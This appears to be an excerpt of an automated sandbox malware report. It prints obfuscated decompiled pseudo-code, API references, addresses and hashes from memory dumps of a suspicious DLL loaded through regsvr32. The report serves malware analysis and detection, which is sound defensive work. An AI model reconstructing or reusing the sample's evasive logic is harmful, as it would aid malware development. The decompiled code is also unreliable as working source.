                          				r11d = _t75;
                          				 *(_t242 + 0x40) = _t71;
                          				_t77 = _t237 + 0xcdf; // 0xcdf
                          				r9d = _t77;
                          				 *(_t242 + 0x38) = _t251 + 0x2103;
                          				r10d = r10d + 0x3a59;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				 *(_t242 + 0x20) = _t244 + 0x3f3;
                          				E00007FF87FF88C071000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
                          				goto 0x8c074c65;
                          				_t219 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t259 = r12d;
                          				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x8c074ae9;
                          				if (r12d - (r8d & r12d) > 0) goto 0x8c074ae9;
                          				_t223 = r10d;
                          				 *(_t242 + 0x60) = _t223;
                          				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x8c074c5f;
                          				_t183 = r9d ^ r12d;
                          				 *(_t242 + 0xd8) = _t183;
                          				_t249 = r9d * 0x36e7;
                          				 *((long long*)(_t242 + 0x70)) = _t249;
                          				 *(_t242 + 0x100) = r14d | 0x00001f2c;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r8d *  *(_t219 + 0x40);
                          				_t217 =  *(_t219 + 0xc8) + _t249;
                          				r11d =  *(_t219 + 0x1c0);
                          				r11d = r11d + 0x1f2c;
                          				_t226 = r13d & _t259 ^ _t217;
                          				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
                          				 *(_t219 + 0xc8) = _t226;
                          				 *(_t242 + 0xf8) = _t190;
                          				r13d = r13d |  *(_t219 + 0x188) | _t183;
                          				r10d = _t217 + _t226;
                          				r9d =  *(_t242 + 0x100);
                          				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
                          				r9d = r9d & _t200;
                          				 *(_t242 + 0x40) = _t219;
                          				 *(_t242 + 0x38) = r10d;
                          				 *(_t242 + 0x30) = r11d;
                          				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
                          				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
                          				E00007FF87FF88C0898F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
                          				r12d = r12d + 4;
                          				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
                          				r9d =  *(_t242 + 0xe8);
                          				r10d =  *(_t242 + 0xc0);
                          				r8d =  *(_t242 + 0x68);
                          				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x8c074b40;
                          				goto 0x8c074c65;
                          				_t129 = _t239 + 0x3595; // 0x3595
                          				return _t129;
                          			}

































                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074825
                          0x7ff88c07482a
                          0x7ff88c07482b
                          0x7ff88c07482c
                          0x7ff88c07482d
                          0x7ff88c07482f
                          0x7ff88c074831
                          0x7ff88c074835
                          0x7ff88c074843
                          0x7ff88c07484a
                          0x7ff88c074852
                          0x7ff88c07485c
                          0x7ff88c074864
                          0x7ff88c07486c
                          0x7ff88c074872
                          0x7ff88c074879
                          0x7ff88c074883
                          0x7ff88c074888
                          0x7ff88c07488f
                          0x7ff88c074896
                          0x7ff88c07489d
                          0x7ff88c0748a5
                          0x7ff88c0748ac
                          0x7ff88c0748b9
                          0x7ff88c0748bf
                          0x7ff88c0748c6
                          0x7ff88c0748cd
                          0x7ff88c0748d4
                          0x7ff88c0748dc
                          0x7ff88c0748e2
                          0x7ff88c0748ec
                          0x7ff88c0748f0
                          0x7ff88c0748f7
                          0x7ff88c0748fc
                          0x7ff88c0748fc
                          0x7ff88c074903
                          0x7ff88c07490e
                          0x7ff88c074919
                          0x7ff88c07491e
                          0x7ff88c074923
                          0x7ff88c07492b
                          0x7ff88c074933
                          0x7ff88c074948
                          0x7ff88c07494e
                          0x7ff88c074952
                          0x7ff88c074955
                          0x7ff88c07495e
                          0x7ff88c074962
                          0x7ff88c07496e
                          0x7ff88c074975
                          0x7ff88c074979
                          0x7ff88c07497f
                          0x7ff88c07498a
                          0x7ff88c07498f
                          0x7ff88c074998
                          0x7ff88c07499f
                          0x7ff88c0749a6
                          0x7ff88c0749b4
                          0x7ff88c0749c1
                          0x7ff88c0749cf
                          0x7ff88c0749d7
                          0x7ff88c0749e1
                          0x7ff88c0749e8
                          0x7ff88c0749e8
                          0x7ff88c0749f5
                          0x7ff88c0749f5
                          0x7ff88c074a08
                          0x7ff88c074a1d
                          0x7ff88c074a20
                          0x7ff88c074a24
                          0x7ff88c074a29
                          0x7ff88c074a2e
                          0x7ff88c074a32
                          0x7ff88c074a36
                          0x7ff88c074a3b
                          0x7ff88c074a40
                          0x7ff88c074a48
                          0x7ff88c074a4f
                          0x7ff88c074a5f
                          0x7ff88c074a64
                          0x7ff88c074a64
                          0x7ff88c074a6b
                          0x7ff88c074a6f
                          0x7ff88c074a6f
                          0x7ff88c074a7d
                          0x7ff88c074a81
                          0x7ff88c074a8f
                          0x7ff88c074a97
                          0x7ff88c074a9c
                          0x7ff88c074aa0
                          0x7ff88c074aad
                          0x7ff88c074ab2
                          0x7ff88c074aba
                          0x7ff88c074acc
                          0x7ff88c074ad7
                          0x7ff88c074af4
                          0x7ff88c074afa
                          0x7ff88c074b02
                          0x7ff88c074b12
                          0x7ff88c074b15
                          0x7ff88c074b1c
                          0x7ff88c074b27
                          0x7ff88c074b2c
                          0x7ff88c074b37
                          0x7ff88c074b4a
                          0x7ff88c074b4f
                          0x7ff88c074b52
                          0x7ff88c074b5c
                          0x7ff88c074b66
                          0x7ff88c074b72
                          0x7ff88c074b74
                          0x7ff88c074b85
                          0x7ff88c074b92
                          0x7ff88c074bad
                          0x7ff88c074bc9
                          0x7ff88c074bd1
                          0x7ff88c074bd5
                          0x7ff88c074bd8
                          0x7ff88c074bdd
                          0x7ff88c074be2
                          0x7ff88c074be7
                          0x7ff88c074beb
                          0x7ff88c074bef
                          0x7ff88c074bfb
                          0x7ff88c074c12
                          0x7ff88c074c2b
                          0x7ff88c074c33
                          0x7ff88c074c3b
                          0x7ff88c074c52
                          0x7ff88c074c5d
                          0x7ff88c074c5f
                          0x7ff88c074c7f

                          APIs
                          • LoadLibraryA.KERNEL32 ref: 00007FF88C0749B4
                            • Part of subcall function 00007FF88C072730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FF88C074A40), ref: 00007FF88C07285E
                            • Part of subcall function 00007FF88C071000: GetProcAddress.KERNEL32 ref: 00007FF88C0710D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 62 $662
                          • API String ID: 2238633743-980518382
                          • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction ID: 42ea4e64debd84b0d3d4b220fab369ae37b6f1b73b3d2f1d48e9ede23fc55d6b
                          • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction Fuzzy Hash: 16B18C776186C5CBD765CF24E484BDABBA4F788788F004125EB8A57B58DB38EA54CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 23%
                          			E00007FF87FF88C0711F0(void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long __r12, long long __r13, long long __r14, intOrPtr _a8, void* _a16, void* _a24, long long _a32, intOrPtr _a40, intOrPtr _a64, intOrPtr _a88, long long _a96, intOrPtr _a104) {
                          				void* _v32;
                          				void* _v40;
                          				intOrPtr _v48;
                          				long long _v56;
                          				intOrPtr _v64;
                          				intOrPtr _v72;
                          				intOrPtr _v80;
                          				intOrPtr _v88;
                          				intOrPtr _v96;
                          				intOrPtr _v104;
                          				void* __rbx;
                          				intOrPtr _t78;
                          				void* _t99;
                          				intOrPtr _t102;
                          				intOrPtr _t108;
                          				void* _t113;
                          				void* _t119;
                          				signed long long _t126;
                          				void* _t130;
                          				long long _t133;
                          				signed long long _t140;
                          				void* _t151;
                          				signed long long _t159;
                          				void* _t164;
                          				long long _t171;
                          
                          				_t119 = _t151;
                          				r11d = _a88;
                          				_t171 = _a96;
                          				r11d = r11d + 0xfffff8a0;
                          				 *((long long*)(_t119 + 0x10)) = __rbp;
                          				 *((long long*)(_t119 + 0x18)) = __rsi;
                          				 *((long long*)(_t119 - 0x20)) = __r13;
                          				r13d = __rcx - 0x3a59;
                          				 *((long long*)(_t119 - 0x28)) = __r14;
                          				r14d = __r8 - 0x1044;
                          				r8d = _a104;
                          				r8d = r8d + 0xffffdefd;
                          				_a8 = __rdx - 0xfd2;
                          				_a88 = r11d;
                          				_a104 = r8d;
                          				if (r8d - __rcx + 0xf35 >= 0) goto 0x8c07130e;
                          				 *((intOrPtr*)(_t171 + 0x98)) =  *((intOrPtr*)(_t171 + 0x368));
                          				r11d = __r8 + 0x329d;
                          				r10d = __r13 + 0x27b2;
                          				_v48 = r10d;
                          				r8d = __rcx + 0xf35;
                          				_v56 = _t171;
                          				_v64 = __rcx + 0xc88;
                          				_t102 = __r13 + 0x27ae;
                          				_v72 = _a64 + 0xde3;
                          				_v80 = r11d;
                          				r9d = __r14 + 0xd93;
                          				_v88 = __r13 + 0x3189;
                          				_v96 = _t102;
                          				_v104 = __r14 - 0x3c4;
                          				_t78 = E00007FF87FF88C0884E0(_t119, _t130, __rsi, __r8, _t164, __r14); // executed
                          				_t133 =  *((intOrPtr*)(_t171 + 0x348));
                          				r8d = _t78;
                          				 *((long long*)(_t171 + 0x158)) = _t133;
                          				goto 0x8c071428;
                          				_a40 = _t102;
                          				r10d = _t102;
                          				_t108 = _t102;
                          				if (_t108 != 0) goto 0x8c07142f;
                          				_a32 = __r12;
                          				r12d = _t133 + 0x2ee;
                          				r12d = r12d & 0x000023f6;
                          				asm("o16 nop [eax+eax]");
                          				if (_t108 == 0) goto 0x8c0713c6;
                          				asm("o16 nop [eax+eax]");
                          				ReadFile(??, ??, ??, ??, ??);
                          				if (1 - ( *(_t171 + 0x220) &  *(_t171 + 0xe8)) + 0x1f2c < 0) goto 0x8c071370;
                          				r10d = _a40;
                          				r11d = _a88;
                          				r9d = 0;
                          				if (r12d > 0) goto 0x8c071406;
                          				_t159 =  *(_t171 + 0x1b8) ^ 0x00002598;
                          				if (_t159 == 0) goto 0x8c0713fd;
                          				r14d = r14d | r13d ^ 0x00002032;
                          				if (1 != _t159) goto 0x8c0713f0;
                          				r9d = r9d + 3;
                          				_t113 = r9d - r12d;
                          				if (_t113 >= 0) goto 0x8c0713e0;
                          				r10d = r10d + 4;
                          				_a40 = r10d;
                          				if (_t113 == 0) goto 0x8c071340;
                          				r8d = _a104;
                          				if (r8d - _a88 + 0xffffef7a < 0) goto 0x8c071503;
                          				 *(_t171 + 0x198) =  *(_t171 + 0x198) * 0x1873ac2e;
                          				if ( *((intOrPtr*)(_t171 + 0x158)) == 0) goto 0x8c0714a9;
                          				_t126 =  *(_t171 + 0x1e0) | 0x000038e9;
                          				 *(_t171 + 0x198) = _t126;
                          				GetProcessHeap();
                          				if (_t126 == 0) goto 0x8c0714a9;
                          				_t140 = _t126; // executed
                          				HeapFree(??, ??, ??); // executed
                          				_t99 =  *((intOrPtr*)( *((intOrPtr*)(_t171 + 0x40)) + 0x200)) - 0x24c;
                          				if (_t99 - _t140 > 0) goto 0x8c071503;
                          				asm("o16 nop [eax+eax]");
                          				 *((long long*)(_t171 + 0x228)) =  *((intOrPtr*)(_t171 + 0x228)) - 0x2598;
                          				if (_t99 + 1 - _t140 <= 0) goto 0x8c0714e0;
                          				return r14d + 0x17e6;
                          			}




























                          0x7ff88c0711f0
                          0x7ff88c0711fb
                          0x7ff88c071209
                          0x7ff88c071211
                          0x7ff88c071218
                          0x7ff88c07121c
                          0x7ff88c071220
                          0x7ff88c071224
                          0x7ff88c071232
                          0x7ff88c071236
                          0x7ff88c07123d
                          0x7ff88c071245
                          0x7ff88c07124c
                          0x7ff88c071259
                          0x7ff88c071261
                          0x7ff88c07126c
                          0x7ff88c07127f
                          0x7ff88c071286
                          0x7ff88c071294
                          0x7ff88c07129b
                          0x7ff88c0712a0
                          0x7ff88c0712a7
                          0x7ff88c0712b2
                          0x7ff88c0712c2
                          0x7ff88c0712c9
                          0x7ff88c0712d4
                          0x7ff88c0712d9
                          0x7ff88c0712e0
                          0x7ff88c0712eb
                          0x7ff88c0712ef
                          0x7ff88c0712f3
                          0x7ff88c0712f8
                          0x7ff88c0712ff
                          0x7ff88c071302
                          0x7ff88c071309
                          0x7ff88c07130e
                          0x7ff88c071315
                          0x7ff88c071318
                          0x7ff88c07131a
                          0x7ff88c071320
                          0x7ff88c071328
                          0x7ff88c07132f
                          0x7ff88c071336
                          0x7ff88c071356
                          0x7ff88c071367
                          0x7ff88c071391
                          0x7ff88c0713b4
                          0x7ff88c0713b6
                          0x7ff88c0713be
                          0x7ff88c0713c6
                          0x7ff88c0713cc
                          0x7ff88c0713d5
                          0x7ff88c0713e5
                          0x7ff88c0713f2
                          0x7ff88c0713fb
                          0x7ff88c0713fd
                          0x7ff88c071401
                          0x7ff88c071404
                          0x7ff88c071406
                          0x7ff88c07140a
                          0x7ff88c071412
                          0x7ff88c071418
                          0x7ff88c071458
                          0x7ff88c071469
                          0x7ff88c07147a
                          0x7ff88c071483
                          0x7ff88c071489
                          0x7ff88c071490
                          0x7ff88c071499
                          0x7ff88c0714a0
                          0x7ff88c0714a3
                          0x7ff88c0714c5
                          0x7ff88c0714d1
                          0x7ff88c0714da
                          0x7ff88c0714e9
                          0x7ff88c071501
                          0x7ff88c071511

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: HeapPrivilegeProcessRelease$FileRead
                          • String ID:
                          • API String ID: 2463951162-0
                          • Opcode ID: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                          • Instruction ID: 88dd406648e4afb3b53a54c50725cf12280b232dd7a6d26d74a8dc89f4bd6970
                          • Opcode Fuzzy Hash: fc6a53031119d0dc1bc682c1a9e483c0e406237abdbb8214a97e5422a85c222a
                          • Instruction Fuzzy Hash: 5671A973609AD18ADB64CF05E048BEE77A8FB89BC4F525025CB5E57B84EB38E545CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07B89C(void* __ecx) {
                          				void* __rbx;
                          				void* _t12;
                          				void* _t17;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          
                          				_t2 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				 *0x8c0b41f8 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				E00007FF87FF88C07BDF4(1, _t12, _t17, _t18, _t19, _t20);
                          				if (E00007FF87FF88C07C7DC() != 0) goto 0x8c07b8cb;
                          				goto 0x8c07b8df; // executed
                          				E00007FF87FF88C07E090(_t17); // executed
                          				if (0 != 0) goto 0x8c07b8dd;
                          				E00007FF87FF88C07C838(0);
                          				goto 0x8c07b8c7;
                          				return 1;
                          			}









                          0x7ff88c07b8b0
                          0x7ff88c07b8b3
                          0x7ff88c07b8b9
                          0x7ff88c07b8c5
                          0x7ff88c07b8c9
                          0x7ff88c07b8cb
                          0x7ff88c07b8d2
                          0x7ff88c07b8d6
                          0x7ff88c07b8db
                          0x7ff88c07b8e4

                          APIs
                          • __isa_available_init.LIBCMT ref: 00007FF88C07B8B9
                          • __vcrt_initialize.LIBVCRUNTIME ref: 00007FF88C07B8BE
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FF88C07C7E0
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FF88C07C7E5
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF88C07C7EA
                          • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FF88C07B8D6
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                          • String ID:
                          • API String ID: 3388242289-0
                          • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction ID: a41d61d37a51fe70c53bfa2300363880e6f17091077ea51712f1c68653b8dcab
                          • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction Fuzzy Hash: ACE01250E0D18345FD9C276190526B81B402F373C4F0414B5D86D861CBCF0F658AE631
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 66%
                          			E00007FF87FF88C07A970(long long __rax, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
                          				void* __rbx;
                          				void* __rbp;
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				void* _t109;
                          				void* _t116;
                          				void* _t148;
                          				void* _t149;
                          				long long _t151;
                          				signed long long _t154;
                          				signed long long _t161;
                          				signed long long _t165;
                          				void* _t166;
                          				long long _t167;
                          				void* _t178;
                          				void* _t180;
                          				void* _t181;
                          				void* _t184;
                          				void* _t186;
                          				long long _t188;
                          				void* _t190;
                          				void* _t192;
                          				void* _t194;
                          
                          				_t151 = __rax;
                          				_t186 = _t180;
                          				 *(_t186 + 0x18) = r8d;
                          				_push(_t161);
                          				_push(_t178);
                          				_push(_t190);
                          				_t181 = _t180 - 0xa0;
                          				r15d =  *(_t181 + 0x100);
                          				r14d =  *(_t181 + 0x110);
                          				r15d = r15d + 0x119f;
                          				 *((intOrPtr*)(_t181 + 0xd0)) = __rcx - 0x44a;
                          				r10d = __rax - 0x283;
                          				 *(_t181 + 0x84) = r15d;
                          				r13d = __rax + 0x170;
                          				 *(_t181 + 0x80) = r10d;
                          				r14d = r14d + 0x9d7;
                          				 *(_t181 + 0x88) = r14d;
                          				 *((intOrPtr*)(_t181 + 0x148)) = __rcx - 0x36e7;
                          				r8d = __rax - 0x16a;
                          				r9d = __rax + 0xd93;
                          				 *(_t181 + 0x100) = r8d;
                          				_t19 = _t161 + 0x2598; // 0x2598
                          				 *(_t181 + 0x110) = r9d;
                          				if (r13d - _t19 < 0) goto 0x8c07ae64;
                          				 *((long long*)(_t186 + 0x10)) = __rsi;
                          				 *((long long*)(_t186 - 0x30)) = __rdi;
                          				 *((long long*)(_t186 - 0x38)) = __r12;
                          				if (r15d == __r10 - 0x173a) goto 0x8c07acf1;
                          				_t188 =  *((intOrPtr*)(_t181 + 0x130));
                          				r10d = 0x3a59;
                          				r9d = r10d;
                          				 *(_t181 + 0x28) = 0x38e9;
                          				_t167 = _t188;
                          				 *(_t181 + 0x20) = r10w;
                          				r8d = 0x23f6; // executed
                          				E00007FF87FF88C079AC0(_t161, __rcx, _t167, _t178, _t194); // executed
                          				r11d = _t178 + 0x37e1;
                          				r9d =  *(_t181 + 0x84);
                          				r10d = _t194 + 0x4c4;
                          				r8d = _t190 - 0x14c1;
                          				 *((long long*)(_t181 + 0x78)) = _t188;
                          				 *((long long*)(_t188 + 0x340)) = _t151;
                          				r15d = r15d + 0xfffff21d;
                          				r9d = r9d + 0xfffff219;
                          				_t154 =  *((intOrPtr*)(_t188 + 0x198)) + 0x0000329d | 0x0000666a;
                          				 *(_t188 + 0x28) =  *(_t188 + 0x28) | _t154;
                          				_t42 = _t161 + 0x27b2; // 0x27b2
                          				 *(_t181 + 0x110) = _t42;
                          				 *((intOrPtr*)(_t181 + 0x70)) = _t190 - 0x278;
                          				r14d = _t190 - 0x17cd;
                          				 *(_t181 + 0x68) = r10d;
                          				 *((intOrPtr*)(_t181 + 0x60)) = r11d;
                          				 *((intOrPtr*)(_t181 + 0x58)) = _t192 + 0x40c;
                          				 *(_t181 + 0x50) = _t190 - 0x12ab;
                          				 *((intOrPtr*)(_t181 + 0x48)) =  *((intOrPtr*)(_t181 + 0xe0));
                          				 *((intOrPtr*)(_t181 + 0x40)) = _t167 + 0x1555;
                          				 *(_t181 + 0x38) =  *(_t181 + 0x110);
                          				 *((intOrPtr*)(_t181 + 0x30)) =  *((intOrPtr*)(_t181 + 0xd0)) + 0xfffff515;
                          				 *(_t181 + 0x28) = r14d;
                          				 *(_t181 + 0x20) = r15d;
                          				_t109 = E00007FF87FF88C088680( *((intOrPtr*)(_t181 + 0x148)) + 0x30d5, _t161, __rcx, _t167, __rsi, __r8, _t184, __r10, _t188, _t190, _t194); // executed
                          				r9d = 0x1f2c;
                          				 *(_t181 + 0x28) = _t161;
                          				r8d = 0x329d;
                          				 *(_t181 + 0x20) = 0x343a;
                          				E00007FF87FF88C079AC0(_t161, __rcx, _t188, _t178, _t192); // executed
                          				 *(_t188 + 0x358) = _t154;
                          				_t165 =  *((intOrPtr*)(_t188 + 0x1b0)) + _t161;
                          				 *( *_t188 + 0x1e0) =  *( *_t188 + 0x1e0) | _t165;
                          				r8d =  *( *((intOrPtr*)(_t188 + 0x40)) + 0x150);
                          				r8d = r8d ^ 0x000017cd;
                          				_t148 = r8d - 0x343c;
                          				if (_t148 >= 0) goto 0x8c07abf1;
                          				_t166 = _t165 - 1;
                          				if (_t148 != 0) goto 0x8c07abe0;
                          				 *((long long*)(_t188 + 0x198)) =  *((intOrPtr*)(_t188 + 0x198)) + ( *(_t188 + 0xb8) ^ 0x000027b2);
                          				_t149 =  *((intOrPtr*)( *_t188 + 0x130)) - 0x3c5 - 0x2032;
                          				if (_t149 >= 0) goto 0x8c07ac25;
                          				if (_t149 != 0) goto 0x8c07ac17;
                          				 *(_t188 + 0x1b8) =  *(_t188 + 0x1c0) | _t161;
                          				r10d = _t190 - 0x4c4;
                          				r8d = _t190 - 0x1a27;
                          				r11d = _t166 - 0xeb4;
                          				 *((long long*)(_t188 + 0x158)) =  *((intOrPtr*)(_t188 + 0x140));
                          				 *((intOrPtr*)(_t181 + 0x58)) = _t190 - 0x8d0;
                          				r9d = _t166 + 0xefd;
                          				 *(_t181 + 0x50) = r10d;
                          				 *((intOrPtr*)(_t181 + 0x48)) = r11d;
                          				 *((long long*)(_t181 + 0x40)) = _t188;
                          				 *(_t181 + 0x38) = _t166 + 0x3f3;
                          				 *((intOrPtr*)(_t181 + 0x30)) = _t166 + 0x13da;
                          				 *(_t181 + 0x28) =  *(_t181 + 0x110);
                          				 *(_t181 + 0x20) = _t109 + 0x70c;
                          				_t116 = E00007FF87FF88C089610( *((intOrPtr*)(_t188 + 0x140)), _t161, _t166,  *(_t188 + 0x1c0) | _t161, __r8, _t184, __r10, _t188, _t190, _t192, _t194); // executed
                          				return _t116 + 0x1086;
                          			}



























                          0x7ff88c07a970
                          0x7ff88c07a970
                          0x7ff88c07a973
                          0x7ff88c07a977
                          0x7ff88c07a978
                          0x7ff88c07a979
                          0x7ff88c07a97f
                          0x7ff88c07a994
                          0x7ff88c07a9a2
                          0x7ff88c07a9b0
                          0x7ff88c07a9b7
                          0x7ff88c07a9be
                          0x7ff88c07a9c5
                          0x7ff88c07a9cd
                          0x7ff88c07a9d4
                          0x7ff88c07a9e3
                          0x7ff88c07a9ea
                          0x7ff88c07a9f2
                          0x7ff88c07a9f9
                          0x7ff88c07aa00
                          0x7ff88c07aa07
                          0x7ff88c07aa0f
                          0x7ff88c07aa15
                          0x7ff88c07aa20
                          0x7ff88c07aa26
                          0x7ff88c07aa31
                          0x7ff88c07aa35
                          0x7ff88c07aa3c
                          0x7ff88c07aa42
                          0x7ff88c07aa4a
                          0x7ff88c07aa50
                          0x7ff88c07aa53
                          0x7ff88c07aa5c
                          0x7ff88c07aa5f
                          0x7ff88c07aa68
                          0x7ff88c07aa6e
                          0x7ff88c07aa7a
                          0x7ff88c07aa81
                          0x7ff88c07aa89
                          0x7ff88c07aaa5
                          0x7ff88c07aaac
                          0x7ff88c07aab7
                          0x7ff88c07aacd
                          0x7ff88c07aada
                          0x7ff88c07aae1
                          0x7ff88c07aaed
                          0x7ff88c07aaf8
                          0x7ff88c07aafe
                          0x7ff88c07ab13
                          0x7ff88c07ab17
                          0x7ff88c07ab25
                          0x7ff88c07ab2a
                          0x7ff88c07ab2f
                          0x7ff88c07ab33
                          0x7ff88c07ab37
                          0x7ff88c07ab42
                          0x7ff88c07ab46
                          0x7ff88c07ab4a
                          0x7ff88c07ab4e
                          0x7ff88c07ab53
                          0x7ff88c07ab58
                          0x7ff88c07ab62
                          0x7ff88c07ab68
                          0x7ff88c07ab6d
                          0x7ff88c07ab76
                          0x7ff88c07ab82
                          0x7ff88c07ab87
                          0x7ff88c07ab9b
                          0x7ff88c07ab9e
                          0x7ff88c07abaf
                          0x7ff88c07abb6
                          0x7ff88c07abbd
                          0x7ff88c07abc0
                          0x7ff88c07abe3
                          0x7ff88c07abe7
                          0x7ff88c07abe9
                          0x7ff88c07ac06
                          0x7ff88c07ac08
                          0x7ff88c07ac1b
                          0x7ff88c07ac1d
                          0x7ff88c07ac2c
                          0x7ff88c07ac3b
                          0x7ff88c07ac48
                          0x7ff88c07ac6c
                          0x7ff88c07ac7b
                          0x7ff88c07ac7f
                          0x7ff88c07ac94
                          0x7ff88c07ac99
                          0x7ff88c07ac9e
                          0x7ff88c07aca9
                          0x7ff88c07acb3
                          0x7ff88c07acb7
                          0x7ff88c07acbb
                          0x7ff88c07acbf
                          0x7ff88c07acf0

                          APIs
                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,-00002103,-00000CDF), ref: 00007FF88C07AD58
                            • Part of subcall function 00007FF88C079AC0: GetProcessHeap.KERNEL32(?,?,?,00007FF88C08D72E), ref: 00007FF88C079B22
                            • Part of subcall function 00007FF88C079AC0: RtlAllocateHeap.NTDLL(?,?,?,00007FF88C08D72E), ref: 00007FF88C079B35
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
